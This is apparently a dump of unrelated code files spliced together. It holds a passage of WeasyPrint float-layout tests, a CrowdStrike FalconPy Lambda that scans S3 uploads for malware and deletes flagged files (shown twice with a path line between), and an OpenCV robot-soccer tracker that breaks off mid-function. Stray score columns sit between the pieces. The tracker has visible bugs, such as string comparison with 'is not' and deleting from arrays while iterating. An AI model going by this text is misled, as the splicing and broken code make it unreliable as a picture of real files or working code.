(130, 60), (0, 60), (0, 80), (70, 80), ]
@assert_no_logs
def test_floats_4():
# c414-flt-wrap-000 ... more or less
page, = render_pages('''
<style>
body { width: 100px }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
<img src=pattern.png /><img src=pattern.png />
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_5():
# c414-flt-wrap-000 with text ... more or less
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body { width: 100px; font: 60px weasyprint; }
p { float: left; height: 100px }
img { width: 60px; vertical-align: top }
</style>
<p style="width: 20px"></p>
<p style="width: 100%"></p>
A B
''')
html, = page.children
body, = html.children
p_1, p_2, anon_block = body.children
line_1, line_2 = anon_block.children
assert anon_block.position_y == 0
assert (line_1.position_x, line_1.position_y) == (20, 0)
assert (line_2.position_x, line_2.position_y) == (0, 200)
@assert_no_logs
def test_floats_6():
# floats-placement-vertical-001b
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<span>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
</span>
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
span_1, = line_1.children
span_2, = line_2.children
img_1, = span_1.children
img_2, img_3 = span_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_7():
# Variant of the above: no <span>
page, = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="width: 50px" />
<img src=pattern.png style="float: left; width: 30px" />
''')
html, = page.children
body, = html.children
line_1, line_2 = body.children
img_1, = line_1.children
img_2, img_3 = line_2.children
assert outer_area(img_1) == (0, 0, 50, 50)
assert outer_area(img_2) == (30, 50, 50, 50)
assert outer_area(img_3) == (0, 50, 30, 30)
@assert_no_logs
def test_floats_8():
# Floats do no affect other pages
page_1, page_2 = render_pages('''
<style>
body { width: 90px; font-size: 0 }
img { vertical-align: top }
</style>
<body>
<img src=pattern.png style="float: left; width: 30px" />
<img src=pattern.png style="width: 50px" />
<div style="page-break-before: always"></div>
<img src=pattern.png style="width: 50px" />
''')
html, = page_1.children
body, = html.children
float_img, anon_block, = body.children
line, = anon_block.children
img_1, = line.children
assert outer_area(float_img) == (0, 0, 30, 30)
assert outer_area(img_1) == (30, 0, 50, 50)
html, = page_2.children
body, = html.children
div, anon_block = body.children
line, = anon_block.children
img_2, = line.children
@assert_no_logs
def test_floats_9():
# Regression test
# https://github.com/Kozea/WeasyPrint/issues/263
page, = render_pages('''<div style="top:100%; float:left">''')
@assert_no_logs
def test_floats_page_breaks_1():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 45px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_2():
# Tests floated images taller than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 81px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 2
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10], [10]]
@assert_no_logs
def test_floats_page_breaks_3():
# Tests floated images shorter than the page
pages = render_pages('''
<style>
@page { size: 100px; margin: 10px }
img { height: 30px; width:70px; float: left;}
</style>
<body>
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
<img src=pattern.png>
<!-- page break should be here !!! -->
<img src=pattern.png>
''')
assert len(pages) == 3
page_images = []
for page in pages:
images = [d for d in page.descendants() if d.element_tag == 'img']
assert all([img.element_tag == 'img' for img in images])
assert all([img.position_x == 10 for img in images])
page_images.append(images)
del images
positions_y = [[img.position_y for img in images]
for images in page_images]
assert positions_y == [[10, 40], [10, 40], [10]]
@assert_no_logs
def test_floats_page_breaks_4():
# last float does not fit, pushed to next page
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10, 70], [10]]
@assert_no_logs
def test_floats_page_breaks_5():
# last float does not fit, pushed to next page
# center div must not
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 60px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 2
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10, 30]]
@assert_no_logs
def test_floats_page_breaks_6():
# center div must be the last element,
# but float won't fit and will get pushed anyway
pages = render_pages('''
<style>
@page{
size: 110px;
margin: 10px;
padding: 0;
}
.large {
width: 10px;
height: 80px;
}
.small {
width: 10px;
height: 20px;
page-break-after: avoid;
}
</style>
<body>
<div class="large"></div>
<div class="small"></div>
<div class="large"></div>
''')
assert len(pages) == 3
page_divs = []
for page in pages:
divs = [div for div in page.descendants() if div.element_tag == 'div']
assert all([div.element_tag == 'div' for div in divs])
page_divs.append(divs)
del divs
positions_y = [[div.position_y for div in divs] for divs in page_divs]
assert positions_y == [[10], [10], [10]]
@assert_no_logs
def test_preferred_widths_1():
def get_float_width(body_width):
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
</style>
<body style="width: %spx; font-family: weasyprint">
<p style="white-space: pre-line; float: left">
Lorem ipsum dolor sit amet,
consectetur elit
</p>
<!-- ^ No-break space here -->
''' % body_width)
html, = page.children
body, = html.children
paragraph, = body.children
return paragraph.width
# Preferred minimum width:
assert get_float_width(10) == len('consectetur elit') * 16
# Preferred width:
assert get_float_width(1000000) == len('Lorem ipsum dolor sit amet,') * 16
@assert_no_logs
def test_preferred_widths_2():
# Non-regression test:
# Incorrect whitespace handling in preferred width used to cause
# unnecessary line break.
page, = render_pages('''
<p style="float: left">Lorem <em>ipsum</em> dolor.</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert len(paragraph.children) == 1
assert isinstance(paragraph.children[0], boxes.LineBox)
@assert_no_logs
def test_preferred_widths_3():
page, = render_pages('''
<style>img { width: 20px }</style>
<p style="float: left">
<img src=pattern.png><img src=pattern.png><br>
<img src=pattern.png></p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_4():
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br>XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_preferred_widths_5():
# The space is the start of the line is collapsed.
page, = render_pages(
'<style>'
' @font-face { src: url(weasyprint.otf); font-family: weasyprint }'
' p { font: 20px weasyprint }'
'</style>'
'<p style="float: left">XX<br> XX<br>X</p>')
html, = page.children
body, = html.children
paragraph, = body.children
assert paragraph.width == 40
@assert_no_logs
def test_float_in_inline_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
width: 14em;
text-align: justify;
}
span {
float: right;
}
</style>
<p>
aa bb <a><span>cc</span> ddd</a> ee ff
</p>
''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, a, p2 = line1.children
assert p1.width == 6 * 20
assert p1.text == 'aa bb '
assert p1.position_x == 0 * 20
assert p2.width == 3 * 20
assert p2.text == ' ee'
assert p2.position_x == 9 * 20
span, a_text = a.children
assert a_text.width == 3 * 20 # leading space collapse
assert a_text.text == 'ddd'
assert a_text.position_x == 6 * 20
assert span.width == 2 * 20
assert span.children[0].children[0].text == 'cc'
assert span.position_x == 12 * 20
p3, = line2.children
assert p3.width == 2 * 20
@assert_no_logs
def test_float_in_inline_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
<div>a b c</div>
1 2 3 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
div, text = span1.children
assert div.children[0].children[0].text.strip() == 'a b c'
assert text.text.strip() == '1 2 3'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 <div>a b c</div> 4 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, = line1.children
text, div = span1.children
assert text.text.strip() == '1 2 3'
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '4 5 6'
@assert_no_logs
def test_float_in_inline_4():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
@page {
size: 10em;
}
article {
font-family: weasyprint;
line-height: 1;
}
div {
float: left;
width: 50%;
}
</style>
<article>
<span>
1 2 3 4 <div>a b c</div> 5 6
</span>
</article>''')
html, = page.children
body, = html.children
article, = body.children
line1, line2 = article.children
span1, div = line1.children
text1, text2 = span1.children
assert text1.text.strip() == '1 2 3 4'
assert text2.text.strip() == '5'
assert div.position_y == 16
assert div.children[0].children[0].text.strip() == 'a b c'
span2, = line2.children
text, = span2.children
assert text.text.strip() == '6'
@assert_no_logs
def test_float_next_line():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 13em;
}
span {
float: left;
}
</style>
<p>pp pp pp pp <a><span>ppppp</span> aa</a> pp pp pp pp pp</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
assert len(line1.children) == 1
assert len(line3.children) == 1
a, p = line2.children
span, a_text = a.children
assert span.position_x == 0
assert span.width == 5 * 20
assert a_text.position_x == a.position_x == 5 * 20
assert a_text.width == a.width == 2 * 20
assert p.position_x == 7 * 20
@assert_no_logs
def test_float_text_indent_1():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p><a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, = paragraph.children
a, = line1.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5 + 1) * 20 # span + a1 text-indent
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 1 + 3) * 20 # span + a1 t-i + a1
@assert_no_logs
def test_float_text_indent_2():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: left;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a></p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == 0
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.width == 3 * 20
assert a1.position_x == (1 + 5) * 20 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (1 + 5 + 3) * 20 # span + a1
@assert_no_logs
def test_float_text_indent_3():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
text-indent: 1em;
width: 14em;
}
span {
float: right;
}
</style>
<p>
oooooooooooo
<a>aa <span>float</span> aa</a>
oooooooooooo
</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children
p1, = line1.children
assert p1.position_x == 1 * 20 # text-indent
assert p1.width == 12 * 20 # p text
a, = line2.children
a1, span, a2 = a.children
span_text, = span.children
assert span.position_x == span_text.position_x == (14 - 5 - 1) * 20
assert span.width == span_text.width == (
(1 + 5) * 20) # text-indent + span text
assert a1.position_x == 0 # span
assert a2.width == 2 * 20 # leading space collapse
assert a2.position_x == (14 - 5 - 1 - 2) * 20
p2, = line3.children
assert p2.position_x == 0
assert p2.width == 12 * 20 # p text
@pytest.mark.xfail
@assert_no_logs
def test_float_fail():
page, = render_pages('''
<style>
@font-face { src: url(weasyprint.otf); font-family: weasyprint }
body {
font-family: weasyprint;
font-size: 20px;
}
p {
text-align: justify;
width: 12em;
}
span {
float: left;
background: red;
}
a {
background: yellow;
}
</style>
<p>bb bb pp bb pp pb <a><span>pp pp</span> apa</a> bb bb</p>''')
html, = page.children
body, = html.children
paragraph, = body.children
line1, line2, line3 = paragraph.children | 0.785267 | 0.517876 |
import io
import os
import time
import logging
import urllib.parse
import json
import boto3
from botocore.exceptions import ClientError
# FalconPy SDK - Auth, Sample Uploads and Quick Scan
from falconpy import OAuth2, SampleUploads, QuickScan # pylint: disable=E0401
from functions import generate_manifest, send_to_security_hub
# Maximum file size for scan (35mb)
MAX_FILE_SIZE = 36700160
# Log config
log = logging.getLogger()
log.setLevel(logging.INFO)
# Boto handlers
s3 = boto3.resource('s3')
ssm = boto3.client('ssm')
# Current region
region = os.environ.get('AWS_REGION')
# Mitigate threats?
MITIGATE = bool(json.loads(os.environ.get("MITIGATE_THREATS", "TRUE").lower()))
# Base URL
try:
BASE_URL = os.environ["BASE_URL"]
except KeyError:
BASE_URL = "https://api.crowdstrike.com"
# Grab our SSM parameter store variable names from the environment if they exist
try:
CLIENT_ID_PARAM_NAME = os.environ["CLIENT_ID_PARAM"]
except KeyError:
CLIENT_ID_PARAM_NAME = "BUCKET_SCAN_CLIENT_ID"
try:
CLIENT_SEC_PARAM_NAME = os.environ["CLIENT_SECRET_PARAM"]
except KeyError:
CLIENT_SEC_PARAM_NAME = "BUCKET_SCAN_CLIENT_SECRET"
# Grab our Falcon API credentials from SSM Parameter Store
try:
ssm_response = ssm.get_parameters(Names=[CLIENT_ID_PARAM_NAME, CLIENT_SEC_PARAM_NAME],
WithDecryption=True
)
client_id = ssm_response['Parameters'][0]['Value']
client_secret = ssm_response['Parameters'][1]['Value']
except IndexError as no_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from no_creds
except KeyError as bad_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from bad_creds
# Authenticate to the CrowdStrike Falcon API
auth = OAuth2(creds={
"client_id": client_id,
"client_secret": client_secret
}, base_url=BASE_URL)
# Connect to the Samples Sandbox API
Samples = SampleUploads(auth_object=auth)
# Connect to the Quick Scan API
Scanner = QuickScan(auth_object=auth)
# Main routine
def lambda_handler(event, _): # pylint: disable=R0912,R0914,R0915
"""Lambda execution entry point."""
bucket_name = event['Records'][0]['s3']['bucket']['name']
bucket = s3.Bucket(bucket_name)
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
upload_file_size = int(
bucket.Object(key=key).get()["ResponseMetadata"]["HTTPHeaders"]["content-length"]
)
if upload_file_size < MAX_FILE_SIZE: # pylint: disable=R1702 # (6 is fine)
try:
filename = os.path.basename(key)
response = Samples.upload_sample(file_name=filename,
file_data=io.BytesIO(
bucket.Object(key=key).get()["Body"].read()
)
)
except Exception as err:
print(f"Error uploading object {key} from bucket {bucket_name} to Falcon X Sandbox. "
"Make sure your API key has the Sample Uploads permission.")
raise err
try:
# Uploaded file unique identifier
upload_sha = response["body"]["resources"][0]["sha256"]
# Scan request ID, generated when the request for the scan is made
scan_id = Scanner.scan_samples(body={"samples": [upload_sha]})["body"]["resources"][0]
scanning = True
# Loop until we get a result or the lambda times out
while scanning:
# Retrieve our scan using our scan ID
scan_results = Scanner.get_scans(ids=scan_id)
try:
if scan_results["body"]["resources"][0]["status"] == "done":
# Scan is complete, retrieve our results (there will be only one)
result = scan_results["body"]["resources"][0]["samples"][0]
# and break out of the loop
scanning = False
else:
# Not done yet, sleep for a bit
time.sleep(3)
except IndexError:
# Results aren't populated yet, skip
pass
if result["sha256"] == upload_sha:
if "no specific threat" in result["verdict"]:
# File is clean
scan_msg = f"No threat found in {key}"
log.info(scan_msg)
elif "unknown" in result["verdict"]:
if "error" in result:
# Error occurred
scan_msg = f"Scan error for {key}: {result['error']}"
log.info(scan_msg)
else:
# Undertermined scan failure
scan_msg = f"Unable to scan {key}"
log.info(scan_msg)
elif "malware" in result["verdict"]:
# Mitigation would trigger from here
scan_msg = f"Verdict for {key}: {result['verdict']}"
detection = {}
detection["sha"] = upload_sha
detection["bucket"] = bucket_name
detection["file"] = key
log.warning(scan_msg)
threat_removed = False
if MITIGATE:
# Remove the threat
try:
threat = s3.Object(bucket_name, key)
threat.delete()
threat_removed = True
except ClientError as err:
log.warning("Unable to remove threat %s from bucket %s", key, bucket_name)
print(f"{err}")
else:
# Mitigation is disabled. Complain about this in the log.
log.warning("Threat discovered (%s). Mitigation disabled, threat persists in %s bucket.",
key,
bucket_name
)
# Inform Security Hub of the threat and our mitigation status
manifest = generate_manifest(detection, region, threat_removed)
_ = send_to_security_hub(manifest, region)
else:
# Unrecognized response
scan_msg = f"Unrecognized response ({result['verdict']}) received from API for {key}."
log.info(scan_msg)
# Clean up the artifact in the sandbox
response = Samples.delete_sample(ids=upload_sha)
if response["status_code"] > 201:
log.warning("Could not remove sample (%s) from sandbox.", key)
return scan_msg
except Exception as err:
print(err)
print(f"Error getting object {key} from bucket {bucket_name}. "
"Make sure they exist and your bucket is in the same region as this function.")
raise err
else:
msg = f"File ({key}) exceeds maximum file scan size ({MAX_FILE_SIZE} bytes), skipped."
log.warning(msg)
return msg
# ██████
# ██ ██
# ██ ████
# ██ ██▓▓████░░
# ████▓▓░░██ ██░░░░
# ██▓▓░░░░██░░░░██░░░░░░
# ██▓▓░░░░██░░██▒▒▓▓██░░░░░░ Let's pour out
# ██▓▓░░░░ ░░██▒▒▓▓▓▓████░░░░ the spoiled bits.
# ██▓▓░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░ ░░░░▒▒▒▒▓▓████ ░░░░
# ██░░░░▒▒▓▓▓▓████ ░░░░░░
# ██▒▒▓▓▓▓████ ░░░░
# ██▓▓████ ░░░░
# ████ ░░ | s3-bucket-protection/lambda/lambda_function.py | import io
import os
import time
import logging
import urllib.parse
import json
import boto3
from botocore.exceptions import ClientError
# FalconPy SDK - Auth, Sample Uploads and Quick Scan
from falconpy import OAuth2, SampleUploads, QuickScan # pylint: disable=E0401
from functions import generate_manifest, send_to_security_hub
# Maximum file size for scan (35mb)
MAX_FILE_SIZE = 36700160
# Log config
log = logging.getLogger()
log.setLevel(logging.INFO)
# Boto handlers
s3 = boto3.resource('s3')
ssm = boto3.client('ssm')
# Current region
region = os.environ.get('AWS_REGION')
# Mitigate threats?
MITIGATE = bool(json.loads(os.environ.get("MITIGATE_THREATS", "TRUE").lower()))
# Base URL
try:
BASE_URL = os.environ["BASE_URL"]
except KeyError:
BASE_URL = "https://api.crowdstrike.com"
# Grab our SSM parameter store variable names from the environment if they exist
try:
CLIENT_ID_PARAM_NAME = os.environ["CLIENT_ID_PARAM"]
except KeyError:
CLIENT_ID_PARAM_NAME = "BUCKET_SCAN_CLIENT_ID"
try:
CLIENT_SEC_PARAM_NAME = os.environ["CLIENT_SECRET_PARAM"]
except KeyError:
CLIENT_SEC_PARAM_NAME = "BUCKET_SCAN_CLIENT_SECRET"
# Grab our Falcon API credentials from SSM Parameter Store
try:
ssm_response = ssm.get_parameters(Names=[CLIENT_ID_PARAM_NAME, CLIENT_SEC_PARAM_NAME],
WithDecryption=True
)
client_id = ssm_response['Parameters'][0]['Value']
client_secret = ssm_response['Parameters'][1]['Value']
except IndexError as no_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from no_creds
except KeyError as bad_creds:
raise SystemExit("Unable to retrieve CrowdStrike Falcon API credentials.") from bad_creds
# Authenticate to the CrowdStrike Falcon API
auth = OAuth2(creds={
"client_id": client_id,
"client_secret": client_secret
}, base_url=BASE_URL)
# Connect to the Samples Sandbox API
Samples = SampleUploads(auth_object=auth)
# Connect to the Quick Scan API
Scanner = QuickScan(auth_object=auth)
# Main routine
def lambda_handler(event, _): # pylint: disable=R0912,R0914,R0915
"""Lambda execution entry point."""
bucket_name = event['Records'][0]['s3']['bucket']['name']
bucket = s3.Bucket(bucket_name)
key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')
upload_file_size = int(
bucket.Object(key=key).get()["ResponseMetadata"]["HTTPHeaders"]["content-length"]
)
if upload_file_size < MAX_FILE_SIZE: # pylint: disable=R1702 # (6 is fine)
try:
filename = os.path.basename(key)
response = Samples.upload_sample(file_name=filename,
file_data=io.BytesIO(
bucket.Object(key=key).get()["Body"].read()
)
)
except Exception as err:
print(f"Error uploading object {key} from bucket {bucket_name} to Falcon X Sandbox. "
"Make sure your API key has the Sample Uploads permission.")
raise err
try:
# Uploaded file unique identifier
upload_sha = response["body"]["resources"][0]["sha256"]
# Scan request ID, generated when the request for the scan is made
scan_id = Scanner.scan_samples(body={"samples": [upload_sha]})["body"]["resources"][0]
scanning = True
# Loop until we get a result or the lambda times out
while scanning:
# Retrieve our scan using our scan ID
scan_results = Scanner.get_scans(ids=scan_id)
try:
if scan_results["body"]["resources"][0]["status"] == "done":
# Scan is complete, retrieve our results (there will be only one)
result = scan_results["body"]["resources"][0]["samples"][0]
# and break out of the loop
scanning = False
else:
# Not done yet, sleep for a bit
time.sleep(3)
except IndexError:
# Results aren't populated yet, skip
pass
if result["sha256"] == upload_sha:
if "no specific threat" in result["verdict"]:
# File is clean
scan_msg = f"No threat found in {key}"
log.info(scan_msg)
elif "unknown" in result["verdict"]:
if "error" in result:
# Error occurred
scan_msg = f"Scan error for {key}: {result['error']}"
log.info(scan_msg)
else:
# Undertermined scan failure
scan_msg = f"Unable to scan {key}"
log.info(scan_msg)
elif "malware" in result["verdict"]:
# Mitigation would trigger from here
scan_msg = f"Verdict for {key}: {result['verdict']}"
detection = {}
detection["sha"] = upload_sha
detection["bucket"] = bucket_name
detection["file"] = key
log.warning(scan_msg)
threat_removed = False
if MITIGATE:
# Remove the threat
try:
threat = s3.Object(bucket_name, key)
threat.delete()
threat_removed = True
except ClientError as err:
log.warning("Unable to remove threat %s from bucket %s", key, bucket_name)
print(f"{err}")
else:
# Mitigation is disabled. Complain about this in the log.
log.warning("Threat discovered (%s). Mitigation disabled, threat persists in %s bucket.",
key,
bucket_name
)
# Inform Security Hub of the threat and our mitigation status
manifest = generate_manifest(detection, region, threat_removed)
_ = send_to_security_hub(manifest, region)
else:
# Unrecognized response
scan_msg = f"Unrecognized response ({result['verdict']}) received from API for {key}."
log.info(scan_msg)
# Clean up the artifact in the sandbox
response = Samples.delete_sample(ids=upload_sha)
if response["status_code"] > 201:
log.warning("Could not remove sample (%s) from sandbox.", key)
return scan_msg
except Exception as err:
print(err)
print(f"Error getting object {key} from bucket {bucket_name}. "
"Make sure they exist and your bucket is in the same region as this function.")
raise err
else:
msg = f"File ({key}) exceeds maximum file scan size ({MAX_FILE_SIZE} bytes), skipped."
log.warning(msg)
return msg
# ██████
# ██ ██
# ██ ████
# ██ ██▓▓████░░
# ████▓▓░░██ ██░░░░
# ██▓▓░░░░██░░░░██░░░░░░
# ██▓▓░░░░██░░██▒▒▓▓██░░░░░░ Let's pour out
# ██▓▓░░░░ ░░██▒▒▓▓▓▓████░░░░ the spoiled bits.
# ██▓▓░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░░░ ░░░░▒▒▓▓▓▓████ ░░░░░░
# ██░░ ░░░░▒▒▒▒▓▓████ ░░░░
# ██░░░░▒▒▓▓▓▓████ ░░░░░░
# ██▒▒▓▓▓▓████ ░░░░
# ██▓▓████ ░░░░
# ████ ░░ | 0.36693 | 0.064653 |
import cv2
import numpy as np
from utils import ShapeDetector
from vision.msg import VisionMessage
offset = 15
class ImageTracker:
def __init__(self, segm_limits, kernel):
self.shape_detector = ShapeDetector()
self.kernel = kernel
self.frame = None
self.vision_msg = VisionMessage()
self.contours = None
self.segm_limits = np.array(segm_limits)
self.ball_position = [0, 0]
self.buffer_ball = [0, 0]
self.allies_shirt = []
self.allies_position = [[], [], []]
self.allies_angles = [0, 0, 0]
self.robots_found = [[False], [False], [False], [False], [False], [False]]
def set_frame(self, frame):
self.frame = frame
def find_colours(self):
self.find_ball()
self.find_team()
self.mount_msg()
def find_team(self):
self.find_allies_shirt()
self.find_robots()
def find_ball(self):
mask = cv2.inRange(self.frame, self.segm_limits[0][0], self.segm_limits[0][1])
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "circle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
if self.contours:
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
if self.buffer_ball == [0, 0]:
self.ball_position = [0, 0]
else:
self.ball_position = self.buffer_ball
else:
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
self.ball_position = [cx, cy]
self.buffer_ball = [cx, cy]
else:
self.ball_position = self.buffer_ball
def find_robots(self):
self.robots_found = np.array([[False], [False], [False], [False], [False], [False]])
self.allies_angles = [0, 0, 0]
for position in self.allies_shirt:
shirt_x = position[0]
shirt_y = position[1]
xi, xf = shirt_x - offset, shirt_x + offset
yi, yf = shirt_y - offset, shirt_y + offset
robot_roi = self.frame[yi:yf, xi:xf]
# Find robot 0
mask = cv2.inRange(robot_roi, self.segm_limits[1][0], self.segm_limits[1][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for c in self.contours:
if cv2.contourArea(c) < 100:
index = np.where(self.contours==c)
self.contours = np.delete(self.contours,index)
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[0] = [shirt_x, shirt_y]
self.robots_found[0] = True
self.allies_angles[0] = self.find_angle(local_id_x, local_id_y, offset, offset)
else:
# Find robot 1
mask = cv2.inRange(robot_roi, self.segm_limits[2][0], self.segm_limits[2][1])
if isinstance(mask, type(None)):
pass
else:
mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, self.kernel)
self.contours, _ = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
if self.contours:
for contour in self.contours:
shape = self.shape_detector.detect(contour)
if shape is not "triangle":
self.contours = np.delete(self.contours, np.where(contour == self.contours))
M = cv2.moments(self.contours[0])
if M['m00'] == 0:
local_id_x, local_id_y = 0, 0
else:
local_id_x = int(M['m10']/M['m00'])
local_id_y = int(M['m01']/M['m00'])
global_id_x = local_id_x + shirt_x + offset
global_id_y = local_id_y + shirt_y + offset
true_x = (global_id_x/2) + shirt_x
true_y = (global_id_y/2) + shirt_y
self.allies_position[1] = [shirt_x, shirt_y]
